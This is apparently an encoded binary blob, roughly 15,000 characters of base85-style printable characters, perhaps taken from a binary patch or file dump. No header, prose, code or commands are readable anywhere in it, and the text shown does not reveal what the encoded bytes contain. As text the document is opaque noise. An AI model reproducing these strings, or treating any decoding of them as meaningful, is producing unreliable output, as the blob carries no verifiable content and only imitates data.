z!q>Ku_P+>Wu}lTarZtagJOi|wKW6c@(D_=J$^sk*$*bAeoGL?I?&e=lRUc5Z*Y9ll z;JZlV*Ev7EWRuoht}auG3r8q7zNJVA_t11=-k6}+>^^Im)i%9)YMJx<^Ljmm|^A<}3T zzBKXO3X>(ovw!%Xx=?m)xCgW&Y^Gkrr%xIxbQM+$x(*#hx*Q|k@Bm}bc#Ni3KGRkq ztu)X;9#g4uN5-xuiJiBu=O8!-$n~9RiB95!u87_0@{+749TjWm(j^kR8x0RmG?9V! zZkGPjy%p3%e`vSU_!YA&R(D_BE}2^Npu|V$YishygZn<7NBvux)3=-5q>ozX@Knl3 zvo$=#W4(GxsTWBx{182R za({Fgy91nM$^o4o2X!D>?C+7NcIS{_y?nNc$na8eBw5!#z!O{_) zL>Uc_>&Q!K(B;a3>#S;?WR{1ze;~d)L6`1Ihks3HG7Kn(zzBS~Xd8jiqueLTaBNCa3fe{~aT4W$0LXG{w;>wL(0Gp7V4eBuXK%Yh?bC@$}aMbVJ=Rc^LiXvOGu|0K9=+19c&5Ha= zcHuHKV3$#0oGPd5?a*IZ+>xuf(J&^!Hy8T+f!6}QTqo^aeOE|+(QPiynk)Yy5nEq; z{1j-tS|nzNeK#hh40o)5YT_1Dy(>N=eAYXa0jfKiJuOpU=4%gw+x}pl`FfG1I(FFx=1D3Ki;L^ z6PIOD^4~Gq^}k{?k{=k&W#NAlqm2d06HhbcY!!SN>Hdf)cHiu-^CH}A(ojNSfRX8u zF`w7La8qxRa4~V3&{?i^3On(xrqp>GzogT_Y1YxSG%6K1pOi#&BS{ z-7R?b2oFXo{rKE)oR{U#J7_!rqm=FRB|CucfFae*#dybOM(s(Z?8IKL{dKh6i8b$7 z^oP4sp@ZSp2FtDiYFaHhB>Q!qA4AO+Y9L5|XIiaEARZ$Pee#j|Z8P=~`8~~RdT1x|R!p82`7)Vkl%w+z zKG)m?6$<>mBLXGt9OTVdQ!(3uIwD}vr|Dym#N|#ugJ=HS=NMiI=q;QA_sJ{t)fP|~ zFx6o5l7dwluWK12b)rm;&Iq#MbSx>)U46P6h6f>vfH8b_O>66P-fH_!fGztTr%OY@ zh$$_8rF)K~V(0D<8lc2z^Fx@HH%`y`AEJYrIvUJoAKi*BT3VzUKU0xCRJo(vm3#Fq z5R}juedknNYFL2lkPyp2lj1Ei&L_h(iY-U_i^%&t#NV6!PIV6Dn73p!1Jqxyp?L0c zdE^ZkI}EGILmPZ3wgm4anNqx38bI*UFt<=T-TBkeKmYhXw5tiJgtOC{alJ4A;w|;H z9vXv##Vil8u2^({k?Xg(57ElO)bAHFD9f%C=x1novTf7dg$U+lwzH0%^F(nBnByzk zNL#2_k=?G%H0VV;93~mZ`IMSX7d?@AF(2&e} z&w^=$-&DNIvfVfJna&N3sCKR)MBAE4YbJ%*z|{^>kgrH^dPCxiYbGXDbro?cGG^^P ztacREfSmq_Ksw+t`9?v(3GFb&lrVupsVGRpqf#Dy5O6)X|-(eCC`BouSYg z4w%4|H<+#L#Zt0Vz4XN4FS*)y2`o+o$!Kc%6ys|Nv%qNsYiSW0~ZklKa4wI2pF z)G3L=YD^$>bI$dPp&?}>NXxpN8J5GwLggRb9vCc{_-YYKGjMM$o2U@}q&AXE$)%cG zeZXpb^YS3JDyykppt|IWI&9}O6k6DjE0ny@9_+@r+M2d0`1P}fZ*ia70kTF}2 zcU^2JfP;sU!AKB%ulYXYh5}U~+_LBD?g2N63qzOts=z*xJAf{WFo3Veuhe>#Am-{J zN?s!rIsscBr(5KDgI@1It4*oK45)LwNfSpn2Q>4`QM~~SzB+IqXq+gecO-=i!+6`F0*jw1{+R?9Lq9+KP_NoHh`35Ai!`j;#!0%g=bAXRE?x-$Q$b%(|KxhzOA zvH|7AN?OdDyuX;1`C|SwE$7q3&e$vcS6lU6qtqyUy$}=>CfG!Aq$e=iyH@eEH#lQQ zr)#$la8N$L_?=yLtk|Zv2fQ17xpcPVx^#auYcq`lqPM{6<+!%Z&;a zb5gvnj_NAEXoOrz@8X@xn$_ND@z$t781JB9T@XjDt$d9GaCy&M=zfFH>Re}bsKcD? z(xH&fP)gL~QtZEWX+xEwcR1bM4+m|2-L7((Wh)%sH@Oe#m}PfUj;3~);2JC9Nx5z` z`O&-s8JmRpCmFa*^(EPG$zJdy&*hz#n)Hg4hfcBCWLOf>1pXyS;2_bl_1C^^&!SKw zg}v!-lnQ=qM&sg$EuN6cfog-E8BalDC=6}tm|D}N6hPNbI(1vtVos2BnLoMx{t7>T z0U$F&)47m}TNQm#a7dpqqsr+owKh`0+6bzJEz)l2*o2;&+~w2!@=H^1WV+JB)qhRB zP(u)EPGQ=W>W9&!skm~GKC>k#S~q)J#AiGB;Lo*VO2Ew!nR~HLs2!sJRaMn>(2n_@ zonS>ssznR0bfHV?t`V)zKFOa-`dw8H`=tuA1MhAtIV6V7x;z@|vu8GeqDpvhr>-o) zWKDw!uxxK+aQ9^cSH^lx*T@!gsONyCrS!~a{L1Tc7`(W9KXk2yRqXAT78bQ~18jZ5 zy9ft!UxwUX)^~11cR*-;wsIqjxP6T;?bpJ=yIk*Bm-pYGx;FUF>8I z-z5QVQns3|nn!rH8kcm$tg>S%5Lar6p#*0h-vPVnm)=tKu-mQ;QQ)zgdS6ggcaS-7 z6~8V>KkPM$o45u8#dUco$Ti=NfFYLJOKZe-sjS#8s>*5|TbZkj#p=i_TggtUQXLl1ZQWG@A zq_m$HntTxZEG)Dvn3P%$b{8fDb?5F=Fy(Aq5(in~z@@8>aD7jPRI{m}%R~ikM40D! zM?XY@gBlwaurr*ToA&s+4B5)&YFz*FTzzbfg`l>va~V1RxH1+>|Zy!Lt#u3y*vKa=9R+kJg^ zayeRo8|D&b^x*+13^T02=9c+u=jO*0`ed*o7G;cbXK3Aaj6GN@^NYzrxeV5kzd-~;j(0-1vl(*4bq%_R{H8Cd z>}ly9uriYR4W!z+3J?8S)ER+?Z*IlG-Caw4Oi$~GrDtUu0=8U+9CDWT{6 zE4@)9`LmQY*9Map*l7 zTAofv+(%Emrz{Ru|Cf^zN$|S|Xn%8v#-nlspB&)7^14Nmgp-oF^$SlWv7lDn&!99y zFyqgWcQJ-x9h#(yta3792>vwx-yKW;a$+=M{?~k6&fhADz(c4@senWkqT_NB_Nn{D zAFLvjV7#m2Hmt%u4a=jUS@pmB{&j-(5 zH2%`jaD-nz*FTzyL%pQDj{fTXo&GP^_}7C^pI)HfzeD`-p~yAD>mOQx9~bn~kMlzl z@xN|arH?brPk**n8|P|&07Pd6cED$nVlLwoemz^OE`SxKLy_b44pYU8=R#OK8IGHj zyixu@jQrDSew0#sNhE6z^%?WNvY{QcM>O2j9GE!PTx;W0f8#kGIR|VpK}jS>lBg-p1pcdx<&s6C1Z8_iL;EVQ-49j1%{0CoqBrA zhYFD*TCA3%cS-M$+KBrhw>++NSNyu)Jmqcq43A>R!IY!VmR2z;J%t^HvM$}K zX#TNZzm-C}R+Oimb|Bxy#0C`cTwKWk=2}M~vXEhWY38MFqrRx^kBwBE`IwYC-j+6$;nC=q=v;*iIb)@J_YamR ze`v$>WSNiHefHf2PtK_xCL<`C1}b-dtKEB~l<^|Kw)7=cqGv%a`!;s{hLktCxq`l{ z6Wy$MQ!L+ooY6K!tbYXF;=Z!)rJ2{m=ZQ0mQVvyo2T|!R#U8<2dUK@dk6$2*ivmqF z?j#!$_~_anNlifs2)3g51w68RAb<5zp<6)5w@(_J6arVg+`=;;J<0qZ{ED;xRB z+HKJ`_F=44Mw8MKJ09*azfR4}I8jS0)gw|BnGpEJaQ}QaqpZPJU-RjwC$FTIb0>G=UN3e4s&Uc-1A z>Xw5r4#w%)vIjoS2cfFh9=xu(@0P_lc;XJ&AXZ%Ac0^;XHGmC<7B@GpoX5TcObv3> zkWs$by4tiX{;)TWIs-WnJL{sI;d;_NelhA4&msbE9<&?nkQRX!d?m0|R<V`0zA)l>5k3G+be6A3mjl7oPcdM zcn(4LNUu3gVPSoy4L&|eGlJht*adLqn5005q_QaKY1Mkrtr1yHj$+g*s&F?N&;`eDnP-gYJ1WX9TIX?^Z)&^VN`vP_S^W=Hd=q2{G`t2xwm*fF^ zA2C9UMxaHi#(pHI=LL=HjJKnjVC4}>{To%&KyGrM=|o-G4(-w{1SAh@&bubA&3(g( z8iK?2+5lpkQN-u)SpmUZxe(MvTxD(c4L?WpJeY(O zdc|(m?P(Q%!DM;U^pVL%ptf9>6ax`AxbFd=pK4`zU++aF!X_uj9}W=`i`U-lz_(h| zVLFJ<4zKYj-6^ASsr!gD=3i511bd|c@m`hT#Ag^w68E9SCvUYEzDU|aw{REo>P+o* z6SW|+HP->;l(NN%e!Ne7%whq7>w{@;4A~O@c+Os}XC{th0Ba0waVL|1i*)ohTprQi zqQIXqUW7oktH}oL5Jaynoa>p@p8G zUwC~^3Qj&$y(+zV`+m414a3y*x#|=@lxW}!yyRMxJRT(*H^5~SWtiprZr$ku=G)j&PZ-~ zvuOyWXTSEf|Ix!0)n{}IB`POy^^h-}gB;9#YRny|T)Cec-t;I}m@Fvc|9I_TL~|{@ z_p%|Au)_Z4I$hC>kQ(2@hcPGVD^QPBx*=Q?9h!FeKv&Yd6yq^sSjASeB+)}3xDn-8iJ~{?ca?z{Nlbc2lqZPvztakKf z@#QrG9@KFlToH*^NF-H}m8gt*u|Q#v1EpLX&QE13`2RbMc%z7as#xyH7)hayf%Idm zb^^XB4_pE?qEcK!3mwtmdP@zPj26nm!$X92L_L>in6Q7RtQoW+nBO1d-^(u|qV>F0 zr8JPE6Lmtv>U~;oUbt2maHA_nJwx##fPUO9`0k~-72Eyi+aX1y{fLtOZen7&I%9o^ z#u@7NE>x;AmNa65lm_rv{ioI&*SOU?lo&G~ZQ%G=TT^0MLNO%@5o%iB^TxYL%VJbM zK7>7Ejo3J5QSal6ERTT^R3#b1X#Uee4%298&R7*(ANxIk{<)y_@VdK6o45gtFTC}y zr7Oa98gDG|B7ia?VK(dC0Ca)X^80VO8r&r$K@_9L%(a;LuI#O63d%W%!-vk*Hth8* z52ym>0l9jCA;2t(2Ches!sc!sI1Q)kZOTm`bau@-$q|F{} zm!kS^*DKgyJhPjQ@K(AhhJ@x#=WMHy3P61}=Jfa@xrT%+wO3rRYFuz0zNO6YlMF@@ z_H^sRrwTLU-qIXWxfC{vIMlp>JWTLv0ut!(CETr0mn{ioOr_oE1O1JNEf{q5svVd^CV1huo=_D9Kpp2y;07v`43n6-nnJvFs-p#Y~>V0bGhvEmu1^Jql zfuq3frM#Ey)oqYDn_(iExDnun>sX?eLM@>}^`IwNwNg`65*MneT$riztIxx1XEG6x z_Z9)$_jVS!EUJF6W3c`Ust9Ev@_P!n4G+#nc|q!t$PGd{-!*ek{PVv3IwgFU4qkhC ztdPeALwslY=DHCV&AGN1+@SD0y)FAq*+x@*z>>%t6!pS5@;JU2k4d4X?yPUaF&~>T znMvn;dO{7bLJ0#|eW1;35f(0q8C>!x67~j=qpUgC=_IJFp#u9OedA_5p$4};irU^< znC}gGTJd3%r+{%Yq9{sOiHG+{V2YX(a-j&$nZI|=QH$fqHr2Yh1}Dkjwx<$Lcs7vo z-GBFIGtW-yi03ljIkQt%y$}_ep5VN`;C6+2DnTDBRB~x_qgCakK1D@|yf_ZWV6r(~ z)1QwxKQo|B_z*6?86Vf;w2}m(zXxf^YAP)+_lADgXoixs3Zi`_bOl}LbJ)Txe9Kdv zq(1%12i=-fVKNPu6DP3MW}A*$8=Qmq8apIQbg?5>TLmh$DI-_e(q%(4XP!*#>%ZJi zAMo$P$5bkFSfL=3bn!I=EF-fp*AaYr2T|*0q)NG2Ae4iU#suHnRTB~_Swnn~61=V~ z8+H~YPTG!DBz>MfihH(}=;oOns#WXFJ~?%26NUm&&6?3?7*mAO_FO{V6_BeF>z#~s z=kn_60hYZ3>$H|q-~-6c86(R_ zPRQok9vCg9J7s|#9hvLfidB{BDmpwy6mC>2dBK7Bflx6q&E3V4P@9ctc+h!3 zN)42nD{oSVV}l&9#TwEvhUb%lO3F&d%=l=5#%r4`#Ew1qi7WV+b0gRIQ=~91AA0+P za32e}GyLDvis$k<-kBJxEqYw$@-=Jfr8v7`NdbLDe9Pk{$4A^8?h1Yn+x5A;g|rr_MJGvBdQL1% zmK&sR3csQK%dCR&w^@aJCh{&}5N(WGnVU4{suo|5U{4oT%_Fr>7eVzH0h9aiI_b#; z*yi?#FTj+VsAF}^Y=;6*J0>8?PgMwUZI+x#eYY-nClxUR_S|Rc@ti){@2TUTaIIq;=S@_Ncb>3f z^Oyd2}i%(F9DF|O_Y{0se z*$ua&` zZl5mNe7((52z$!tz-*lf$tFfMHvmQjRIlc*V;DaJnBuWQ2&Nd-`_^8t1|J$mHxm3R zp{u^bpmQ>{EF|M#wa3eC6*7%@9VQXZf5~?vBtONR$E=TK0e{`#Hv;fz2M!MVu>H%~ z@{fEZ%?~NfM;jXZ1I)iLgx|jn1tr@Se)=0ad4hT=Xs=!VVv}s+iTFf5PADxGInAsz zH}u2Fsi@jbCN)o2FoBE2f3ltXtLLvCwXkiXm7#%UajA7M%)`1FvH1j{#d{Ui4GZCg zwS)>cNj#X*qIq>(=<4YQg~5wshRPaC!ZITW-*VE(3bjlB2N7VA3O89HH$Vh)7Mni> zsaxKgJ-(yzipt7yCPA7p+iYRY?(%)>@_U8&=j%?ZMM0vwHgWQ=nh{QN^FUd;)6wQ zn0ky+!n*ldgW3v9J2)_Il+d=V4%&c&-4hp`Z?=Qp_2LCjbfl3QuVGKL;da^*k;~|@ zrP)!w}OZnF4Y87+C?Wxe(DrlQMfDkYA z7Obae)XG#hY^OU%r1v?EW)gL)H|ty0pa%Sh^!tsfjzhS@Rf;UEX&2FBXij0+)DPi~ z0M*9rnVH~yXu%B8iF`|5{6Uir`I5ZwqB=KU{I@NSAL7NURS8~6-?a1WB0H)nM^noK zr`5Ad!(Bs~nBat&m3pjbuT~B@ai&~aTvptVXbT&j)V)a8A&#~%im{@X5o41x$i5Hm zJ#ck*UnJaU<4+v1BNznz`I`SGnAIH2t>=YH#36Ez=D=`{77Zoj)B`5500DY_d1PMg zd~%h6|KSuprG+h%RB1upv|zFDJ>3I4qs5Ca7K}#PlFq8Wg7ol)1A^6JKxwAz;ErrD znTGr5`zdAEh{VjY@i$X26xT#mDlesTcQeF`V4QUUFB|N{MvFm63l@cCs~K;f*UJ4g z&;a|Al2bZJ)Ac3q6P?-EspCR>zUAjmeuoEbM|Z1iUM-k8edXO3WiCJf4=Q~(la6kh zv(&M4SXi1ls*3hT3tH3ucDNl4Ri&^l0gzTf;?jK%a*eC58i|^@cR{|Slk@eMF+BdD z2albK^tMtBu&G>_sDPsqOWkwHMVO}6g#-_Z?b^bEmiEZWuFbS#IL&)0|0?y(0oUw0 zlLBs2z_jRoU1)7&`wX#$IPaEeuIX2wsCu5UDPu@HpHDcxk~&`p;gpI7Cp#;+6&I@t zYYRK?(c6N^%bLvCo+0PO^D_7-#|Fl`X&!d=^C;^u{a&J<7QD{Qo=ZNcGGlN zw;Ex%;w5;S5x!hlv13S=dWYc18FUOM?F-Z7WVcKGO^=bcBD&W(8duS#X)$=*EZbJp zukybD{q(oM>c_*|1oNq-N9EG)*$?nqzu^dMFxeF%^FS+TTe9_zTmZ?U&+6Dtm0k+vmx4?)@c9%3(UcXnh+E_q!q6i@LA7-(#2ctfb7jooh0^eEPT) zq(h-Z7q5>)_$5|`h-q!?Rt_naGb5!OuMdIYECeCJfi(bh@mjUwjIw;Qkmu9L&0r*v zs2Wzhly9_>6LWEY8?tq|Umu_5X~!o2X)4T-nO zO4)>krLEL=vcg~k(KHzP{gHe=U)izx8z5eruJ@tU?J26ctGC{E>B6CYwA`n6Lj2@1 zU2^SijN+=kpyxH!4ZZ}6waN3+!^jzSTeG zEi>iw=Z0c-^9JNC@FM^WK|r>k?9ncPBwubAtC#9?(I(AOucRWsvnuIBmbkDjT$Q!` z+*fgoH5~IQ#%;F3i0<=-VI7b1i=PZS-##@Z600cnXN;+uNv7(8t>GAcMY(!;r2TsB zHop#NC)N55Kn*T!3yg?8TkeC$=I@m5yPiL7Nm1RnA;+nc_U}S-az{BY8htHcW#xOa zV^dn%6ij02_5U&U4epgM+qRvK?R1=u?T+nqY+EZ>vE4~Jwr$(CJ7&kWZNBV%?%wCz zbMCwE{Q>Ly)%vPx)|_LEIp$7(McK>d4hA*h{g$*v`D2)r$`b>N`6mo4~l^s8#k|B6!BMes|Ou2dZq@$gzlGk?F zagO5W-9xGwXfn^b#WJqv6@$!KUI^2vR)o4miN3q^1z)|yv{uw&o}G-K_b{-#O{vy0 zJ$dSVj~=Gcor-nZ)%~F3CRcCdf%_L|Y;Rp-`?rPcC74t9IDw75w9ASdcX^&M{c%22$$HXZ^9xa#)Lyd~7z|hk%$S^DdVm!jqJ^ z5ZDpb?Tua+r2|u+L(RMFmBJ1+7b@17@_+`-YL^{%+%#j*2_&b`97U}9qe4RN)`dZ0 z)N|i>+Vkq&&D}}&d&aPM%qmW7TBojx!<425JIXtVlCED4*agk_zE+Kd3)c+sw^ZRD zvsrS!_aKiFYzItGDNouh0i}35U`iTtSwi4mrIPyN=1w!6dsK#C@0e(LXLt#s>eyn~k}-$^?+g$Z*Z+R@ z(00*2$F&0Q?rA2Q2fGj7cdYFAp+p(9oJ^{Jcj_{fuJ6t)b{+ zQqaV01q87s(XX$ZrfW z+l?Mhnrkcwi$Ic_g$5KJgFAyQ1%YZ=n~R5D)Yh7-z(EWE{;)`1*)iTEK^w+1!mVJ+ zpe;My8!RF6_sJp!NMj*1583GZwZ7ZM07EHMtF5`QZwq$^KT66r5^v=TkiAaw{O-SS z7cY>rIg9_rk#%*7{V3glWCiRwB2iyEmV$I+STuw4-GwtOA5-7k^v1xLPg5l zId7O%!YC^@U`-?CYF-R2AOMP_q$4b`Uo zHi6a|10Vfq`#!mTgR30!Bm!pf`M)8bzwpbmCrq-7`yMtrTIpYM!ND23N0sCoIgF;a zksq}f>~lXG2*dch`py&lq+~uKHtN-*S;dXx(406PwvTJ^gxHgW*nEhJRc9swOYgzo z3@DW~xo?ehoMbZP<#ePBhxL}E0`654Z6X@p;F<>=FppgDPq`7ykR{q1^I$l_#8_+h zv9yw6TE&OK6tZn>&U5m|OBDTbFiOOYV?5KV{F=j@WcPX8OMVmEd5)R~&G~&OUHi*M zX~bS{LyobSr^I)%^82hl5ivqw~~ zbmX4Tl2cqs4rl*1gRUr+w>=IA`#^DpB|w8gdA`csT*CHAW$uGjvt%zz1cL%7CHC{* z`O>HTpfr&-0F9*0NCW6HQL(Un-L{8?CE1*Vpi!HGb7uo~r$I~|EKwp zo&#Lb2AN;G+($(9V(qcNErumQ_zma}uajq)aiW#d8IMiIzzW2p!>YTI60hsqE!767&#;f^*CZVE%37N_+&M33z}a}n5e^lpfUru$YrT|@7NDcU`DNM{64^a}L% z9@#D{98rm=WfBVEt6)FWTbE+NJ${2KhF|nAQ_UE29i@GsG+sgWhutRM?wir_wvb)) zF<$lewh!lurJV=stTGPpb7vD^(N-oACgYFI7ggfup7B@fuJl1ZD(M_F{umr%ucN6j ziBZ?A7GB);vT5+k9{%c=4buDCe6hlVO`oz{v{HlCy9U~*_cJoQjmnip9N4O;pL=#m zASgHUyyItrwAD-CwvB_u6S?mTi38HNUGG0)d95;*gFv9@2i#QdOD5#D>HUmHXyMh2 zhWPcmJ(XNFl}!wF3{%T)i0Lax`_5|3<9pr$`NT!1 z_uF>y^@VyT_9~=m|0UkJT!#f0re|}wP$SxCq&FYhAJD^}nuad#kWYYaS=0b{wP4bl zG#e^!R$`S6_m6>iu|71Hr?3r$sT;?e0H~X`iMgtk9_|s|1-C=%zFJ7oysCWXlt=vf zQuP#;D*NR6-bpqn$r*k;!v^7d!7~~@M_RmtxEZ5R%XsgHa>l_FW?eaptxUC7Nn9PC zc%`&B`2Tz`9;R-|mk75;dRMa?6gqdLSMa?kaRL_@DmVWVBxOy(hqSPGM+%1RIYKK)i8@Uvq0<7AV6%AIfG(>OB z@OckDFjGN!NBP8YmSvYA2xrQcr`gJO59-~e5Hf+N@=)0exX*R7oGCNxB!QM4KN>`q zv$XkcWfd%gbaIUirMIhUpyn^wDLQti7@0vP(we2iF6rP7##JaT=4!j}CO<7UYE0|u zfQh(f#gVzYwfc&=VY{D-KgDplYgl;;IlMKq&SKN__#gNSnknDulp@sg)>kjn-+QuG zmU#RTTlES)^W0RY`jEXX>zm{U@Non5?x0jhpSjMhQtehvJ~OSix>np*4xRjFfH!;W zXd1QnXs>etGUl(GOEcN~1xhu9g-y^3BF7(T8tm^ws>J4IWkMVJ6C-9|J zhq`P3c-gG(PY>L}|87OOb35Kqh3)}JC2OL~$H(O$tFO#MW#U~n3LU{#^pRRYPvdL+ zRO0*3f@sV9 z#1d`}*d53Xym;3@9@B^)Y~A-IwIbppWNbz>K{_xRQPF8(H+Wu%##}N%?co~h8D&(y z*4U2Lhh0PAt=6Qs#A2*fB^Mz8&Z>6bCKeN+--3R*JxL}Ei$!i^mIXF=VoSa&{1{0{3iP+2*fUJw z^Ui`2%CLwMD=5+~B*K!X;Jt(frutq@mQ$F)IHTpP8}pZXSt=<|fWluG4i1ZZqKxu& zF8s~(Fj(^mKlC;*v0vefzP4P^TkbYPsMBchnCKl%WZD?4$+vmAL22H53hpb{PO49l|^LZOAteey|Wf`SumINInIW52Ria z1AtVZzPe!wVZ_0#5crzR{6ix&l5@yE1!_L${QO67op$x%Q$^_* zCEw0|eBgXV_bVWZ&S3lY-*Mu@!@HcGhk2&|q@P-ChdAp>v3s(tm?V_H@z1Q2=_?G9 zJV>=ijPCD~t^K%OlvU$(r!5e+8XQAHpT*Vlm*?~7slPqzk#04#vAuMHYvIJPs4VIA zI_2OFRS?L1%CV2E8Dk4r%n)H<`Q&EyP)%-uVMoxpLvEwyfdKlJ99iw&UbUTZF#lF# z5ZTlGxI8uCh%vW1JFq!crgzN=l5fE(kSg)E&@iRg1j35+HUa)Xj{{p;|Gj9_5st1> zSPjN|7YCMfFymiHqsuE?ra`3@PiR`VgAM~SI9-u{*TJ=r)~Rx(02>R6O7%*h^>nqj!U4r z&f&dVq}A+a_z_0s1xP@&udG<*uTY~&X+EvlR1COG(A!=vk+rY%Mi^JF2p<&Nq95Pc zhkEuoMr0>6z*&`m$WiG_-8|n9X71Q?mkNQ|zN-GttgsOU+~!nAW8M|hNG=RXMzd-B z2cTR3c1=@Q-n~_Z)~gLZBp#XJa+{@E!qbRlKNw-1n#@RzF$oKT;{W;maW+4gBQ5L=c--RsW$!)l)7rJ7J z2b(;`F=8%Ll4*%7r2Lrb-8@s!UQ1d@pY&bYJdoglY&~dFkb^ZS<8H- zSatwgmj1arc$mcCg{HZsjEt>oh?5u47f)HZ zGfEhHyk6Rwpyytz%&=Yu|Jo_K)!fUJrq8zW{iK1@#vhz!8^a)Bmq0B)(+Be%XJN_$ zUdD(wTXivzN(1gVJR}>i=~kIF^SonErO5*`{}}Z_d$9Z-!&C(E>gk1yscr+6pr=Om@SDv5Iv6Zq+#kqyWhW9Fy-&o zvo775`-HWAxg=R1k*S#g>Q|Hv8+9M?A9y&3w9&HKkCqX z`i_+iVxp*+x90xBMG~4cb&y1{vMySc6I9%4z`S1SwK2_#L9pcMd*957`Ye-uJh>Bo z#v-F%w%}#4hINoR~6R zmw!`9bZV$cZgy^T?k)GHQ*z|J))9E+(WQ$o$zH z=6Tl320vIu`o6nmY>P8Plx(^_R2-8s(a%`1b#U!0F(bv?S9nnuoXs6THRjd-;dMVL z=@I%P)?4pM@P5>I(BU7&(H~++k<3rDhqO@Sr0uX^pzCB=Q{!b1+aqBLWmFms+`z!}&m=?_WjUkjn-tm0la z>BB`$YW0~n17iq|I1K{e@C2-%gj&;cxQ?2lB<-obxjoHS9pvE ztXf+rRs(9#-`wFy_XBFSpXr`D02Ou%Pjrm-SW^PEjN6QP7LIggi-LI7>`eDdR}szw zc_uaP9@n+Q*r9^QQ$Ga)5lju#?otD#ApV_ve{cfpgY{a{)<1Pb-q%_09W&L{YVro7 zPC(?>PH&S@O52Gl#EjNXvRS)QOvrLVq=CEmsToGlwvE4G9z>16N!vfkx@(7yrMcAn(a@Mn-A1i6#7}oH2Asl zs_0Tk3@)`6;#n$;;rEX019`~ZMNdM5(*?Sj#4|;kqeA5mDu@;+Emm9{`a+>rH&BOE z9!UG~c|r3~TXq~e6LoXHl1-$ARketOYSk+D0Tb@9Nq*x!Rq8zc;)z$K-y-oE=odZX zpPlw&vb5_7Tb9)f`$dHE8q=X0DT?X5W>9U#_6>FvLGvJZ1(w+AmAK=nLnCW$DB=yw zi42HyF9nJvI@4>2hAx)dR>=cUe;XEGiLEZ zn-!0DV3|SAGr>0Vf5{%S=5aG+_WE8jeMRz89oIWvL4~59!Gy=55GSC(bB%~Ttm^}6Pf%VJsq5SG7X)#&GOF< zeoH&h>3@)qv|T3Wr8ePh;kC{PdKvzVS2DgzLc3OmRU5O=xZX}UX9Q>6w~HLWIy88l zh>WY=Dq8#Rg@|cZFMiCe&%r)3xO$L{E^Ja3>Gw+M;DF87aRfY;+U4B^lo^_GA7Z-r zD^pHK+B?Xn9^xg)!ph2l%5n#h1mfeYRTTG=W_$F+^|e5;9chep(Xc}ej`JAf@REZz z1Gb1x1E%v8+mkf#t2_iqf-LYdU50?OZF%tDdS@A}VH1vGgJoZvZy4l_`$^%;b53_t z^n+I2fUS;L`$Fek#CP(0VFl8$!utbPVO)brf)V%#0TN>$(;~Y2W0(9W(@g7>X9BE^-5zT>;_fCdOlS>rwz5cx_ z1!ZZr`&*+wCFX_J9lbYgzNQMiZW2}mu6A7>&za_uDqZ+-us-Vy))%!lowS11&Rg|l zM{(J}v;X+6?QpGOW;LwizG}mA#7oDw09u+^DnKhng!>M6;(v*HYI|7o#bW}mx1_lc zxpWz2EZjAHH-3ARz&MO6Q8LYtijA!=JpT9_4kYop!MZO&6pzuBydoA6ljFaw-2p@71~oH=-CB{i%f~cK8=9{34zYQ@Y-?Sn60y?O-{(YtMfXd^}Fi zGGzywS86(tkNewv#6GJs=85Pldr*6*{|^pMvG8r9e!;ou%QSaHukFXMwqS8z(RfY@ zoEV<^Xd&4)Se1sh!35ewq4U*21{L2%-Ab*Vv4_m5YHJ~2>$MVv{tvp>W5UZT)&~#t zZ?+3DS(*y5FHN&krq!TM((`@w@sibSa^Ru`GYn(5NDi&=-5G(!QkG`3N3+P%C=q&Z zm~0*@#l8tMCWcp+$`6wsM09PaYIDNWt-We&N6d8P8bRd~)AHrV;%W}4mmz+L7hsTX zcY%tEut2_PtPGRw4a}r`Vjeo8<1chP!y%F=zdtt|Hg<1N@}T4m%>mBXH}u;586l^Rk92k8<~`= zoXfPZO_roG5X(0_tZYI@2c^nd))!wDDXvibBVezV!SG#$ga;?6{S8a%M{fd(E*tie zRsUA>xvfnCJhu=p2xq)}sTX!nZ6`s=5)>_Vd;g}6#f3o}o{IEKkY}e9|G_UuwT}MJ z^C{M%Hg`$p`CGdUj_j8b@b!VxJ?9Z(Su9xutWAKi`*Cp@pABWQ=gDGq^rhm;i>G+; zTm`S)Ap+8HuEb7m!(p_cvGBG5ht?&%-083>_qwi!T*UeK+)V^tdais!OaDySUKW3?p-C6i*= zpFZlSlolvJJ3A}hfBgd~0s(}b)0R}hy=3cdya(f1DO)`s#GUE{^Cij!=Qy3uWU+FR zpmU-OeBF#k&sk|p+|sBBGG-E|shmMUScq{#Bn&2f=_Wo8ZEpzFHL>1M@!k z{K?m({XHtxHwsEs@Vyx!+xyH(To{m!BU4@=wT9Cy0GzLT4Gg!z#bAG{?DK00@Xjg> z@vQZ^hfkx5(MJ!$^=+Kd#c`0pYL|d$F^5L5ouFH}7qY?RRz6X>3SoS$v-_F7VX4)~ z>CWyl&@ERoiJ_M7WHmji)A`kA;pTioi`R&06X8~MM7uERgcsEWS9UblaeQB%d} zWy|fx#8pEa@F~DOc|U<|hTU`2$!~Ze%84~5JwxH*A7s=bt%K;CwnIeIln404HW2)rYDUT3p^C&WZ=^T~I`vDEBpQOdZ*BZx@a zW^<)ktl`NNByK*YA`Sa*#UNl-9V7}TBY+sONGbYS*@BI`A&Up@8br5mYXb?gprW0( zV(Gsm7i>ga0?TMLxouf2V73(qY&Jzzs_AD&!t_>bBYT>VrS*TtB2j+d6~*j^vHdR+ z$+Aptstd~T_xg5CV%5T6{}v7mC3S`MK~9o+hV4Fz*;xtrgU9umKAkulm62|d)cicB!H;t#_XalRAm7RT zFVK77+(KFVo>`l;qqQe~<%w^i+?sCjJqcFkd+xIpCT4R{?KIRk@IBMt2%DBfF71Jwg<> zY96Y#in4f9637gxUGRB0j{0FUauO6*#y6LqyAOD3DDUWgck$OQxp*4UeMAfx1b<+# z`S?ATvsM{rY9&9lQ0WC)X!NFnGO87|x<>3NTLFk8{38$ez}1(Z{cemPk90$mu|smu zw!s{C@Hj35>F!dyJ03EaOqfhq`8y?o&Dj*|9`4z?*38V1n!*JYklG4j zjR8qpFJ0LC#=MtJkJTs^j1YEG#mLXi$S&Z8%q_hhQ=DPfslM$x9QL)aml-jUkwmu9 zH2)sYutJNTZ;!i)klj*F9u&N@d~1>nsMFb###}PtqDo&=2Yx9?XuVf zYOC2S?O?-XqD@{^pc}4>&rt#Kfr4$wold-pn8nG`R`n!VcTIa<%9+Q5O*6^qIZUofx#S7;M0rtqYLcvq z?)*NNL=}T`?s=j59-gxI6tWVI9N^G5b>Q8;Vze{5J;gnYx}ST2Bt zx5%xjM!w>1WqU;>`WP6!B{7$+{Tm6wF;>1L2PEZ<6*`uatQ&CTXvFJHd0uwjqj+Z zYF3dw!z+Opx$U0eY)tEih~{jRn;R=#h>8h%4Jn9)6RND%6yS0m!~Udx&3AW*%f_Fl 